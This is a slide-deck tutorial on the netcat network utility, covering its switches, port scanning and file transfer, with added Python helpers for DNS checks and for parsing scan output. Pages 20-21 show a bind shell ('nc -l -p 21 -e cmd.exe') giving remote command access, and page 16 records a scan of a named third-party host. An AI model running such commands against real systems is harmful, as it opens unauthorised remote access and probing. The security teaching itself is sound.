Page 1
netcat
Page 2
Purpose of Presentation?
• Analyze the network
• Identify the network security issues
How to do it?
• First step: research the network
Page 3
Tools for Research
• Information gathering tools
• Forensic tools
• Network utility tools
• Password auditing tools
• Recovery and restoration tools
• Vulnerability scanning and analysis tools
Page 4
What is netcat?
• The Swiss Army knife of networking
• A versatile network utility tool
• Uses the TCP and UDP protocols
• Designed as a backend tool: can be used directly or driven by other programs
Page 5
Power of netcat
• Can create outbound or inbound connections, TCP or UDP, to or from any port
• Full DNS forward/reverse checking
• Can use any local port
• Can use any locally configured network address
• Port scanning with a randomizer
• Option to let another program service established connections
• Optional telnet responder
Page 6
How Do I use netcat?
• General form of usage: nc [switches] [hostname] [portnumber]
• Simplest usage: nc -v www.msn.com 80, then send a request with the GET method: GET / HTTP/1.0
• Hostname can be a name or an IP address
Page 7
Use of the -n switch
• If not specified, netcat performs forward and reverse DNS lookups and reports mismatched names in DNS:
D:\tools\nc>nc -v www.hotmail.com 80
DNS fwd/rev mismatch: www.hotmail.com != hotmail.se
DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com
DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com
www.hotmail.com [207.68.171.233] 80 (http) open
• If specified, netcat takes only an IP address as the hostname argument
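The forward/reverse check behind the "DNS fwd/rev mismatch" warning, as an added example that is not part of the slides: the resolver is swapped for a constructed lookup table so it runs offline, and the names and addresses in that table are placeholders, not real DNS data.

```python
# Added example: what `nc -v` checks before connecting, and what -n skips.
# FORWARD/REVERSE are constructed sample records, not real DNS; the real_*
# functions show the equivalent live lookups.
import ipaddress
import socket
from typing import Callable, Dict, List, Tuple

# Constructed: one name with two addresses; only the first PTR points back.
FORWARD: Dict[str, List[str]] = {"www.example.test": ["192.0.2.10", "192.0.2.11"]}
REVERSE: Dict[str, str] = {"192.0.2.10": "www.example.test",
                           "192.0.2.11": "edge-lb.example.test"}

def fake_forward(name: str) -> List[str]:
    return FORWARD.get(name, [])

def fake_reverse(ip: str) -> str:
    return REVERSE.get(ip, "")

def real_forward(name: str) -> List[str]:       # live equivalent of fake_forward
    return socket.gethostbyname_ex(name)[2]

def real_reverse(ip: str) -> str:               # live equivalent of fake_reverse
    try:
        return socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return ""

def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def check_fwd_rev(target: str, numeric_only: bool = False,
                  forward: Callable[[str], List[str]] = fake_forward,
                  reverse: Callable[[str], str] = fake_reverse) -> Tuple[List[str], List[str]]:
    """Return (addresses, warnings). numeric_only mirrors -n: no DNS at all,
    so the target must already be an IP literal. Otherwise every forward
    address is reverse-resolved and a warning is raised when the PTR name
    does not match the name that was queried."""
    if _is_ip(target):
        return [target], []                     # nothing to cross-check
    if numeric_only:
        raise ValueError(f"-n given but {target!r} is not an IP address")
    addrs = forward(target)
    warnings = []
    for ip in addrs:
        ptr = reverse(ip)
        if not ptr:
            warnings.append(f"no reverse DNS record for {ip}")
        elif ptr.rstrip(".").lower() != target.rstrip(".").lower():
            warnings.append(f"DNS fwd/rev mismatch: {target} != {ptr}")
    return addrs, warnings
```

A mismatch is not an error by itself (load balancers and shared hosting produce them routinely), but it is the signal netcat gives you that the name you typed and the host you are about to talk to are not the same record.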
Page 8
Options
-v  Controls the verbosity level
-w <seconds>  Sets the network inactivity timeout
-p <port number>  Binds the connection to a specific port number
Page 9
Options
-o <file name>  Obtains a hex dump file of the data sent either way
-l  Makes netcat wait for inbound connections; once a connection is established it transfers the data
Page 10
Interesting: -l
• Can be used to create a listening netcat server
On the listening end: D:\tools\nc>nc -l -p 1234 < test.txt
On the client end: D:\tools\nc>nc 192.168.0.100 1234
Page 11
Options
-L  Listen harder
-r  Randomize port numbers
-z  Zero-I/O mode (used in scanning)
Page 12
Options
-e <program name>  Executes a program (dangerous)
-d  Runs in detached mode, without a console window
-u  Makes a UDP connection instead of a TCP connection
Page 13
Options
-s <address>  Local source address
-i <seconds>  Specifies the delay interval for lines sent or ports scanned
-t  Answer telnet negotiation
Page 14
Put the Knife to Use
• Use it GOOD
• Use it BAD
Page 15
USE IT GOOD
Port Scanning
• Find what is out there
• nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30
Page 16
D:\tools\nc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30
davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) open
SSH-2.0-Sun_SSH_1.0
davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) open
davinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) open
internet2 proxy-telnet [v3.1] ready
√☺Please enter your userid:
davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open
220-Sendmail 8.6.12/8.6.12 ready on internet2
220 ESMTP spoken here
davinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open
220- internet2 proxy-ftp [v3.1] ready
220 Please enter your userid
D:\tools\nc>
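Turning the `nc -v` scan output above into a reviewable port inventory, as an added example that is not part of the slides: banner lines are attached to the port that produced them, the random order from -r is undone by keying on port, and cleartext login services are flagged. SAMPLE is a constructed excerpt modelled on the slide's output with a placeholder host.

```python
# Added example: parse `nc -v` scan output and review it from the defender's
# side. SAMPLE is constructed; the host and address are placeholders.
import re
from dataclasses import dataclass, field
from typing import Dict, List

STATUS_RE = re.compile(r"^(?P<host>\S+) \[(?P<ip>\d+\.\d+\.\d+\.\d+)\] "
                       r"(?P<port>\d+) \((?P<service>[^)]*)\) open\s*$")
PROMPT_RE = re.compile(r"^[A-Za-z]:\\[^>]*>")          # the cmd.exe prompt
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet"}             # credentials in the clear

@dataclass
class PortResult:
    port: int
    service: str                       # netcat's service name, "?" if unknown
    banner: List[str] = field(default_factory=list)

def parse_nc_scan(text: str) -> Dict[int, PortResult]:
    """Map each open port to its status line plus any banner printed after it."""
    results: Dict[int, PortResult] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or PROMPT_RE.match(line):
            continue
        m = STATUS_RE.match(line)
        if m:
            current = PortResult(int(m["port"]), m["service"])
            results[current.port] = current
        elif current is not None:
            current.banner.append(line)    # banner belongs to the last port seen
    return results

def review(results: Dict[int, PortResult]) -> List[str]:
    """Findings a reviewer would raise from the inventory, in port order."""
    findings = []
    for port in sorted(results):
        r = results[port]
        if port in CLEARTEXT_PORTS:
            findings.append(f"{port}/tcp {CLEARTEXT_PORTS[port]} exposed (cleartext logins)")
        if r.service == "?" and not r.banner:
            findings.append(f"{port}/tcp open with no known service or banner")
    return findings

SAMPLE = """D:\\tools\\nc>nc -v -w 5 -r host.example.test 20-30
host.example.test [192.0.2.3] 22 (?) open
SSH-2.0-Sun_SSH_1.0
host.example.test [192.0.2.3] 28 (?) open
host.example.test [192.0.2.3] 23 (telnet) open
internet2 proxy-telnet [v3.1] ready
host.example.test [192.0.2.3] 21 (ftp) open
220 Please enter your userid
D:\\tools\\nc>"""
```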
Page 17
USE IT GOOD
Simple Data Transfer Agent
• It is immaterial which side is the server and which side is the client
• Input at one end goes out as output at the other
HEX Dump Feature
• Can be used to analyze odd network protocols
Page 18
USE IT GOOD
Performance Testing
• Generate a large amount of useless data on the network, with a server on one end and a client on the other, to test network performance
• Protect your workstation's X server
Page 19
DARK SIDE
• Scanning for vulnerable services: files can be used as input to netcat, and the system scanned using the -i and -r switches
• The -e option can be used to execute programs
• SYN-bombing: can disable TCP servers
Page 20
EXAMPLE
• Listen on port 21 (the FTP port) using netcat with the -e switch to execute cmd.exe
• An FTP request is made from a different machine to the listener machine
Page 21
RESULT
LISTENER
D:\tools\nc>nc -l -p 21 -e cmd.exe
REQUEST
C:\Documents and Settings\RAJAT>ftp 192.168.0.100
Connected to 192.168.0.100.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\tools\nc>
Page 22
Environment
Local Home Network
• ISP: Cogeco
• Three PCs, OS Windows XP
• Connected via a D-Link router
• Cat 5 connecting cables used
Page 23
Conclusion
• Netcat is a very useful network utility tool
• Very light but extremely effective, particularly because it can listen and execute programs when connection requests arrive on specific ports
Page 25
THANK YOU